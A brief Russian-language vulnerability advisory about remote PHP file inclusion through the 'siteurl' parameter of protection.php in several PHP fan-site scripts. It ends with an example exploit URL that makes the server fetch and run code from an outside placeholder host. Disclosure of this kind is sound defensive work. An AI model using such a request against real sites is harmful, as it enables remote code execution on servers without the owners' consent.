Программы:
PHPCalendar 1.x
PHPClique 1.x
PHPCurrently 2.x
PHPFanBase 2.x
PHPQuotes 1.x
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует при обработке входных данных в
параметре "siteurl" сценария protection.php.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный PHP сценарий на системе с
привилегиями web сервера. Для успешной
эксплуатации уязвимости опция register_globals
должна быть включена в конфигурационном
файле PHP.
Пример:
http://www.example.com/protection.php?action=logout & siteurl=http://yourhost.com/malicoius-code.txt